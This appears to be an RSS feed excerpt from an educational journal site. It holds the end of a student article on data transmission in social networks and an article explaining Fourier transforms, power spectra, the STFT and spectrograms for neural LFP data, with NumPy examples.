<p>Data-to-data transmission across social network sites is essential because it supports ongoing interaction between users. On these sites, information diffusion is the process by which data and information pass from one user to another. Every social network site must ensure that information diffusion is fast to avoid disappointing its users. When studying data-to-data transmission across social network sites, one of the fastest approaches is to use densest subgraphs. The densest subgraph makes it easier for analysts to map out data-to-data transmission between users and to ascertain the social position of every user. It also overcomes the inefficiencies of the Louvain community detection algorithm. On the other hand, transmitting data from one user to another is equally critical. Traditional wireless technologies have been marred by high latency and low data throughput. Meanwhile, the ever-increasing number of smartphones, tablets, and Bluetooth-enabled computers has spread users across larger geographical areas. With the emergence of 5G networks, an opportunistic network will support much faster data-to-data transmission. This holds provided that the routing algorithm used also supports fast data-to-data transmission.</p>



<h2 class="wp-block-heading">Works Cited</h2>



<p>Dasgupta, Subhasis, and Amarnath Gupta. &#8220;Discovering interesting subgraphs in social media networks.&#8221;&nbsp;<em>2020 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining (ASONAM)</em>. IEEE, 2020.</p>



<p>Epasto, Alessandro, Silvio Lattanzi, and Mauro Sozio. &#8220;Efficient densest subgraph computation in evolving graphs.&#8221;&nbsp;<em>Proceedings of the 24th international conference on the world wide web</em>. 2015.</p>



<p>Faloutsos, Christos, Kevin S. McCurley, and Andrew Tomkins. &#8220;Connection subgraphs in social networks.&#8221;&nbsp;<em>SIAM International Conference on Data Mining, Workshop on Link Analysis, Counterterrorism and Security</em>. Vol. 2. 2004.</p>



<p>Faragó, András, and Zohre R Mojaveri. &#8220;In search of the densest subgraph.&#8221;&nbsp;<em>Algorithms</em>&nbsp;12.8 (2019): 157.</p>



<p>Spyropoulos, Thrasyvoulos, Konstantinos Psounis, and Cauligi S. Raghavendra. &#8220;Spray and wait: an efficient routing scheme for intermittently connected mobile networks.&#8221;&nbsp;<em>Proceedings of the 2005 ACM SIGCOMM workshop on Delay-tolerant networking</em>. 2005, pp. 252-259.</p>



<p>Tsourakakis, Charalampos E. &#8220;A novel approach to finding near-cliques: The triangle-densest subgraph problem.&#8221;&nbsp;<em>arXiv preprint arXiv:1405.1477</em>&nbsp;(2014).</p>



<p>Vahdat, Amin, and David Becker. &#8220;Epidemic routing for partially connected ad hoc networks.&#8221; (2000).</p>



<p>Xiao, Yutong, and Jia Wu. &#8220;Data transmission and management based on node communication in opportunistic social networks.&#8221;&nbsp;<em>Symmetry</em>&nbsp;12.8 (2020): 1-13.</p>



<p>Yang, Weiyu, Jia Wu, and Jingwen Luo. &#8220;Effective data transmission and control based on social communication in social opportunistic complex networks.&#8221;&nbsp;<em>Complexity</em>&nbsp;2020 (2020).</p>



<p>Yazdi Majbouri, Kasra, Adel Majbouri Yazdi, Saeid Khodayi, Jingyu Hou, Wanlei Zhou, Saeed Saedy, and Mehrdad Rostami. &#8220;Prediction optimization of diffusion paths in social networks using integration of ant colony and densest subgraph algorithms.&#8221;&nbsp;<em>Journal of High-Speed Networks</em>&nbsp;26, no. 2 (2020): 141-153.</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/KakaoTalk_20211119_143622236.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Geonwoo Kim</h5><p>Geonwoo is currently a junior at Crean Lutheran High School in Irvine, California.
</p></figure></div>



<p>The post <a href="https://exploratiojournal.com/data-transmission-via-social-network-sites/">Data Transmission Via Social Network Sites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Neural Data Analysis Using Spectral Techniques</title>
		<link>https://exploratiojournal.com/neural-data-analysis-using-spectral-techniques/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=neural-data-analysis-using-spectral-techniques</link>
		
		<dc:creator><![CDATA[Gitika Tirumishi Jada]]></dc:creator>
		<pubDate>Sun, 10 Oct 2021 13:07:13 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[biology]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[neural networks]]></category>
		<category><![CDATA[Science]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1043</guid>

					<description><![CDATA[<p>Gitika Tirumishi Jada<br />
CMR Institute Of Technology, Bangalore</p>
<p>The post <a href="https://exploratiojournal.com/neural-data-analysis-using-spectral-techniques/">Neural Data Analysis Using Spectral Techniques</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Gitika Tirumishi Jada</strong><br><em>CMR Institute Of Technology, Bangalore<br></em>September 1, 2021</p>
</div></div>



<h2 class="wp-block-heading">1. Introduction</h2>



<p>Data science is the study of data. It unifies statistics, data analysis, informatics and their related methods in order to understand real phenomena through data. Data science is an interdisciplinary field focused on extracting knowledge from large data sets (for example, big data) and applying that knowledge to solve problems in a wide range of application domains.</p>



<p>The methods used to process the data in this paper are similar to those of signal processing. Digital signal processing deals with discrete-time signals, and some of the algorithms and techniques it uses are the Discrete Fourier Transform (DFT), the Fast Fourier Transform (FFT) and Finite Impulse Response (FIR) filtering. Along with these, we make use of spectrograms to study the properties of these signals in different domains.</p>



<p>In this report, we make use of LFP (local field potential) data, which is a form of neural data. The data is recorded from the brain by probes (micro-needles) inserted into it. These micro-needles are placed in various parts of the brain, giving rise to many signals recorded at different spatial locations. To show how neural analysis of these brain signals can be performed in both the time and the frequency domain, we introduce the DFT and FFT techniques as well as the short-time Fourier transform (STFT) and the spectrogram. Correlations of these LFP signals are introduced towards the end of the report to investigate the relations among the signals, which give an idea of how the brain functions when subjected to certain tasks and which of its parts are functionally connected.</p>



<h2 class="wp-block-heading">2. Time series</h2>



<p>A time series is a collection of data recorded over a period of time, or at different points in time. In most cases, a time series is a sequence of values taken at successive, equally spaced points in time; it is then called a discrete-time sequence or a regular time series. If the values are not taken at equally spaced points in time, it is called an irregular time series. When more than one variable is recorded at each point in time, the result is a multivariate time series.</p>



<p>A time series provides additional information that can be analysed and used for prediction. Time series analysis studies the relationships between different points in time within a single series.</p>



<p>When dealing with time series and data in the time domain, we often analyse a continuous signal through its samples. Sampling can give rise to an effect called aliasing: two different signals become indistinguishable once sampled if the sampling rate is too low, that is, below twice the highest frequency present in the signal (the Nyquist rate). The term also refers to the distortion or artifact that results when a signal reconstructed from its samples differs from the original continuous signal.</p>
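<p>A minimal sketch of aliasing, written with NumPy (our choice of tool; the sampling rate and frequencies are arbitrary illustrative values, not taken from the study): a 3 Hz cosine and a 13 Hz cosine sampled at 10 Hz produce identical samples, because 13 Hz lies above the Nyquist frequency of 5 Hz and folds back onto 3 Hz.</p>

```python
import numpy as np

fs = 10.0                            # assumed sampling rate in Hz (Nyquist frequency = 5 Hz)
n = np.arange(20)                    # 20 sample indices, i.e. 2 seconds of data
t = n / fs                           # sample times in seconds

low = np.cos(2 * np.pi * 3.0 * t)    # 3 Hz: below Nyquist, sampled faithfully
high = np.cos(2 * np.pi * 13.0 * t)  # 13 Hz = 3 Hz + fs: above Nyquist

# Once sampled, the 13 Hz wave cannot be told apart from the 3 Hz wave.
aliased = np.allclose(low, high)
print(aliased)  # True
```

<p>Any frequency of the form 3 + m·f<sub>s</sub> Hz (for integer m) would give the same samples, which is why signals are low-pass filtered below the Nyquist frequency before sampling.</p>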



<p>Neural data signals are one example of a time series. There are many types, such as the electroencephalogram (EEG) and the local field potential (LFP), all of which are recorded from the brain. They are used to understand how the brain works, in particular which parts of the brain are more active when subjected to certain tasks. We discuss the LFP further in later sections.</p>



<h4 class="wp-block-heading">2.1 Time domain and frequency domain</h4>



<p>The time domain is where signals are plotted with respect to time, and time domain analysis is the analysis of a time series with reference to time. In the time domain, the signal’s value is a real number at each instant, and a graph in the time domain shows how the signal changes over time.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-17.png" alt="" class="wp-image-1202" width="493" height="307" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-17.png 860w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-300x187.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-768x479.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-230x143.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-350x218.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-17-480x299.png 480w" sizes="(max-width: 493px) 100vw, 493px" /><figcaption>Fig 1: A cosine wave represented in the time domain, with a time period of 1000s. This wave was generated by mixing (adding) two different cosine waves with different periods.<br></figcaption></figure></div>



<p>The frequency domain is where signals are plotted with respect to frequency rather than time, and frequency domain analysis is the analysis of a function or series in the frequency domain. A frequency-domain plot shows how much of the signal lies within each frequency band over a range of frequencies.</p>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-18.png" alt="" class="wp-image-1203" width="616" height="406" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-18.png 838w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-300x198.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-768x506.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-230x152.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-350x231.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-18-480x316.png 480w" sizes="(max-width: 616px) 100vw, 616px" /><figcaption>Fig 2: This is the same mixture of cosine waves shown in Fig. 1 here displayed in the frequency domain. As we can see, there are two frequency components, one at 10000 Hz with an amplitude of 0.9 and another at 10 Hz with an amplitude of 2.8</figcaption></figure></div>
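<p>The two peaks in Fig. 2 can be reproduced with a short NumPy sketch. The amplitudes (2.8 at 10 Hz and 0.9 at 10000 Hz) are taken from the caption; the 25 kHz sampling rate and the one-second duration are our own assumptions, chosen so that both frequencies fall exactly on DFT bins.</p>

```python
import numpy as np

fs = 25_000                                  # assumed sampling rate (Hz); must exceed 2 x 10000 Hz
t = np.arange(fs) / fs                       # one second of samples
x = 2.8 * np.cos(2 * np.pi * 10 * t) + 0.9 * np.cos(2 * np.pi * 10_000 * t)

X = np.fft.rfft(x)                           # DFT of a real signal, non-negative frequencies only
freqs = np.fft.rfftfreq(len(x), d=1 / fs)    # frequency (Hz) of each DFT bin
amps = 2 * np.abs(X) / len(x)                # convert bin magnitudes to cosine amplitudes

top_two = np.sort(freqs[np.argsort(amps)[-2:]])   # the two strongest components
print(top_two)                                    # close to 10 Hz and 10000 Hz
for f0 in top_two:
    print(f0, amps[np.argmin(np.abs(freqs - f0))])  # amplitudes close to 2.8 and 0.9
```

<p>The factor 2/N converts a one-sided DFT magnitude back into the amplitude of the corresponding cosine; it does not apply to the 0 Hz and Nyquist bins.</p>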



<h4 class="wp-block-heading">2.2 Fourier Transform</h4>



<p>A given function or signal can be converted between the time domain and the frequency domain by mathematical operators called transforms. The most commonly used is the Fourier transform, which expresses a function of time as an integral (a continuous sum) of simple waves, namely sines and cosines. The spectrum of these frequency components is the frequency domain representation of the signal. The Fourier transform of a signal x(t) can be written as</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM.png" alt="" class="wp-image-1205" width="374" height="124" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM.png 780w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-300x99.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-768x254.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-230x76.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-350x116.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.35-PM-480x159.png 480w" sizes="(max-width: 374px) 100vw, 374px" /></figure>



<p>The original signal can be reconstructed by applying the inverse Fourier transform:</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM.png" alt="" class="wp-image-1204" width="364" height="128" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM.png 714w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-300x106.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-230x81.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-350x124.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.06.42-PM-480x169.png 480w" sizes="(max-width: 364px) 100vw, 364px" /></figure>



<h4 class="wp-block-heading">2.3 Discrete Fourier Transform</h4>



<p>The Fourier transform is defined over an infinite, continuous time axis, whereas the discrete Fourier transform (DFT) converts a finite number of equally spaced samples of a function in the time domain into a complex-valued sequence of the same length in the frequency domain. (The DFT should not be confused with the discrete-time Fourier transform, or DTFT, which applies to sampled sequences of unlimited length and yields a continuous function of frequency.) Since experimental recordings never last infinitely long, we always deal with finite time series and therefore use the DFT instead. The DFT is defined as</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-1024x406.png" alt="" class="wp-image-1206" width="531" height="211" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-1024x406.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-300x119.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-768x305.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-920x365.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-230x91.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-350x139.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM-480x190.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.09.04-PM.png 1064w" sizes="(max-width: 531px) 100vw, 531px" /></figure>



<p>This yields a spectrum of all the frequency components present in the signal, similarly to the Fourier transform. One of the many applications of the DFT is spectral analysis: when a signal x(t) is sampled at uniformly spaced times, the DFT of the samples tells us about the frequency components, in other words the spectral content, of the signal.</p>
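<p>To make the DFT formula concrete, here is a direct, unoptimized implementation of X<sub>k</sub> = Σ<sub>n</sub> x<sub>n</sub> e<sup>-2πikn/N</sup> in NumPy. It is a sketch that assumes the common sign and normalization convention (no scaling on the forward transform), which may differ in detail from the figure above. The result is checked against <code>numpy.fft.fft</code>, which computes the same quantity with the Fast Fourier Transform in O(N log N) operations instead of O(N²).</p>

```python
import numpy as np

def naive_dft(x):
    """Direct DFT: X[k] = sum_n x[n] * exp(-2j*pi*k*n/N), using O(N^2) operations."""
    x = np.asarray(x, dtype=complex)
    N = len(x)
    n = np.arange(N)                         # time indices as a row
    k = n.reshape(-1, 1)                     # frequency indices as a column
    W = np.exp(-2j * np.pi * k * n / N)      # N x N matrix of complex exponentials
    return W @ x

rng = np.random.default_rng(0)
x = rng.standard_normal(64)                  # arbitrary real test signal

X_naive = naive_dft(x)
X_fast = np.fft.fft(x)                       # FFT: same result, O(N log N)
print(np.allclose(X_naive, X_fast))          # True
```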



<h4 class="wp-block-heading">2.4 Power Spectral Density</h4>



<p>We can also derive a power spectrum from a time series. The power spectrum S<sub>xx</sub>(ω) of a time series x(t) is the squared magnitude of the frequency spectrum obtained by taking the DFT of the time series.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM.png" alt="" class="wp-image-1208" width="472" height="111" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM.png 760w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-300x70.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-230x54.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-350x82.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.52-PM-480x112.png 480w" sizes="(max-width: 472px) 100vw, 472px" /></figure>



<p>Where Y(ω) is the DFT of the signal x(t).</p>
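<p>A minimal sketch of the power spectrum as the squared magnitude of the DFT, written with NumPy. The 5 Hz test sine, the 100 Hz sampling rate and the 1/N normalization are our own illustrative choices; other texts scale the power spectral density differently (for example by the sampling rate or by the window energy).</p>

```python
import numpy as np

fs = 100                                     # assumed sampling rate (Hz)
t = np.arange(2 * fs) / fs                   # 2 seconds of samples
x = np.sin(2 * np.pi * 5 * t)                # 5 Hz test signal

Y = np.fft.fft(x)                            # DFT of x
S_xx = np.abs(Y) ** 2 / len(x)               # power spectrum: squared magnitude of the DFT
freqs = np.fft.fftfreq(len(x), d=1 / fs)     # bin frequencies, positive and negative

peak = abs(freqs[np.argmax(S_xx)])
print(peak)                                  # the power is concentrated at +/- 5 Hz
```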



<p>The spectral density obeys an important theorem, Parseval’s theorem, which states that the sum (or integral) of the squared magnitude of the time signal equals the integral of its spectral density:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM.png" alt="" class="wp-image-1207" width="476" height="131" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM.png 922w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-300x83.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-768x212.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-920x253.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-230x63.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-350x96.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.10.57-PM-480x132.png 480w" sizes="(max-width: 476px) 100vw, 476px" /></figure>



<p>An important consequence of this theorem is that the total energy of a signal is the same whether it is computed in the time domain or in the frequency domain.</p>
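<p>Parseval’s theorem is easy to check numerically. With NumPy’s DFT convention (no scaling on the forward transform), the discrete form reads Σ|x<sub>n</sub>|² = (1/N) Σ|X<sub>k</sub>|²; the 1/N factor depends on that convention and is an assumption of this sketch, as is the random test signal.</p>

```python
import numpy as np

rng = np.random.default_rng(1)
x = rng.standard_normal(1000)                      # arbitrary real signal, N = 1000 samples

X = np.fft.fft(x)
energy_time = np.sum(np.abs(x) ** 2)               # total energy computed in the time domain
energy_freq = np.sum(np.abs(X) ** 2) / len(x)      # same energy computed in the frequency domain

print(np.isclose(energy_time, energy_freq))        # True
```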



<h4 class="wp-block-heading">2.5 Short Time Fourier Transform</h4>



<p>Another type of Fourier transform is the short-time Fourier transform (STFT), which is used to measure the sinusoidal frequency and phase content of the signal within a particular window of time. It involves dividing the signal into shorter time segments of equal length and then computing the DFT of each segment separately. This gives the Fourier spectrum of each segment individually, which we can then plot to see how the spectrum changes over time. For a signal x(t), the STFT is the Fourier transform of the product of x(t) and a window function that is non-zero only for a short period of time and is slid along the signal.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-1024x324.png" alt="" class="wp-image-1210" width="596" height="187" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-300x95.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-230x73.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-350x111.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/Screen-Shot-2021-10-10-at-8.18.47-PM-480x152.png 480w" sizes="(max-width: 596px) 100vw, 596px" /></figure>



<div class="wp-block-image"><figure class="aligncenter size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-19.png" alt="" class="wp-image-1209" width="434" height="268" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-19.png 622w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-300x185.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-230x142.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-350x216.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-19-480x296.png 480w" sizes="(max-width: 434px) 100vw, 434px" /><figcaption><br>Fig 3: Several segments of the same signal are taken one after another and the DFT is computed for each of them</figcaption></figure></div>
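<p>The procedure described above (cut the signal into short segments, multiply each by a window, take the DFT of each) can be sketched in NumPy as follows. The Hann window, the 256-sample segment length, the 128-sample hop and the test signal are assumptions for illustration; libraries such as SciPy provide ready-made STFT routines with more options.</p>

```python
import numpy as np

def stft(x, fs, nperseg=256, hop=128):
    """Short-time Fourier transform: windowed DFTs of successive, overlapping segments.

    Returns (freqs, times, Z) where Z[f, m] is the complex spectrum of segment m.
    """
    window = np.hanning(nperseg)                       # tapers each segment's edges to zero
    starts = np.arange(0, len(x) - nperseg + 1, hop)   # first sample of each segment
    segments = np.stack([x[s:s + nperseg] * window for s in starts])
    Z = np.fft.rfft(segments, axis=1).T                # one DFT per segment (one column each)
    freqs = np.fft.rfftfreq(nperseg, d=1 / fs)
    times = (starts + nperseg / 2) / fs                # centre time of each segment
    return freqs, times, Z

# Assumed test signal: 10 Hz during the first second, then 40 Hz during the second.
fs = 512
t = np.arange(2 * fs) / fs
x = np.where(t < 1.0, np.sin(2 * np.pi * 10 * t), np.sin(2 * np.pi * 40 * t))

freqs, times, Z = stft(x, fs)
dominant = freqs[np.argmax(np.abs(Z), axis=0)]         # strongest frequency in each segment
print(dominant[0], dominant[-1])                       # 10.0 40.0
```

<p>A single DFT of the whole signal would show both 10 Hz and 40 Hz but not when each occurs; the STFT recovers that timing, segment by segment.</p>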



<h2 class="wp-block-heading">3. Spectrogram</h2>



<p>The spectrogram is a 2-dimensional representation of the STFT in which time and frequency are shown in the same plot, on the horizontal and vertical axes respectively. As shown in Fig. 3, each DFT is computed over a short time segment of the original signal. In the spectrogram, the squared magnitude of a segment’s DFT (its power spectrum, i.e. the spectral energy density) is laid out along the frequency (y) axis and colored according to its intensity. Consecutive DFTs are placed one after the other along the time axis.</p>



<p>Consider the time signal shown in Fig. 4. The signal is active between 0 and 3 seconds, after which it is zero (silent) for one second. The activity resumes at the 4th second and continues until the end of the signal.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-20-1024x204.png" alt="" class="wp-image-1211" width="540" height="107" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-1024x204.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-300x60.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-768x153.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-1536x306.png 1536w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-920x183.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-230x46.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-350x70.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20-480x96.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-20.png 1615w" sizes="(max-width: 540px) 100vw, 540px" /><figcaption><br>Fig 4: Time signal consisting of various frequencies.</figcaption></figure></div>



<p>Fig. 5 shows the spectrogram of the time signal above. As depicted, various frequencies are present from 0 to 3 seconds and again after the 4th second, and there is a gap in the spectrogram corresponding to the silent interval in the signal. The spectrogram shows how strongly each frequency is present at each point in time. The four distinct yellow lines are the frequency components with the greatest magnitude in the time signal, and the color bar indicates the magnitude associated with each color.</p>



<div class="wp-block-image"><figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2021/10/image-21-1024x450.png" alt="" class="wp-image-1212" width="640" height="281" srcset="https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-1024x450.png 1024w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-300x132.png 300w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-768x338.png 768w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-920x404.png 920w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-230x101.png 230w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-350x154.png 350w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21-480x211.png 480w, https://exploratiojournal.com/wp-content/uploads/2021/10/image-21.png 1067w" sizes="(max-width: 640px) 100vw, 640px" /><figcaption><meta charset="utf-8">Fig 5: Spectrogram of the given time signal shown in Fig. 4.</figcaption></figure></div>
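<p>A spectrogram is the squared magnitude of the STFT arranged as a time-frequency image. The NumPy sketch below builds a signal loosely modelled on Fig. 4 (activity, one second of silence from 3 s to 4 s, then activity again) and confirms that the power vanishes in the segments that fall inside the gap. The component frequencies, the 5 s duration and the window settings are our own assumptions, not the signal used in the figure.</p>

```python
import numpy as np

fs = 1000                                      # assumed sampling rate (Hz)
t = np.arange(5 * fs) / fs                     # 5 seconds of samples
x = np.sin(2 * np.pi * 50 * t) + 0.5 * np.sin(2 * np.pi * 120 * t)
x[(t >= 3.0) & (t < 4.0)] = 0.0                # one second of silence, as in Fig. 4

nperseg, hop = 200, 100                        # 0.2 s Hann-windowed segments, 50 % overlap
window = np.hanning(nperseg)
starts = np.arange(0, len(x) - nperseg + 1, hop)
frames = np.stack([x[s:s + nperseg] * window for s in starts])

Sxx = (np.abs(np.fft.rfft(frames, axis=1)) ** 2).T   # spectrogram: rows = frequency, columns = time
freqs = np.fft.rfftfreq(nperseg, d=1 / fs)            # frequency of each row (Hz)
times = (starts + nperseg / 2) / fs                   # centre time of each column (s)

# Segments lying entirely inside the silent interval carry no power at any frequency.
inside_gap = (starts / fs >= 3.0) & ((starts + nperseg) / fs <= 4.0)
print(Sxx[:, inside_gap].max())                       # 0.0
```

<p>To display it, <code>Sxx</code> can be drawn as an image with <code>times</code> on the horizontal axis and <code>freqs</code> on the vertical axis, for example with Matplotlib’s <code>pcolormesh</code>; a logarithmic (decibel) color scale is often easier to read.</p>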



<h4 class="wp-block-heading">3.1 Time-Frequency Uncertainty Principle</h4>



<p>Looking at this spectrogram, one may wonder how to obtain a precise value of the time or frequency of a component. Several parameters can be adjusted to control this precision, one of them being the length of the window used for each Fourier transform. With a narrow window, the temporal (time) precision is high, but there are very few frequency bins between 0 Hz and the Nyquist frequency (half the sampling rate). As the window gets longer, there are more frequency bins, so the frequency resolution increases; at the same time, the temporal precision decreases because each DFT integrates over a longer period of time. Therefore, there has to be a trade-off between frequency resolution and temporal resolution to obtain a useful spectrogram.</p>



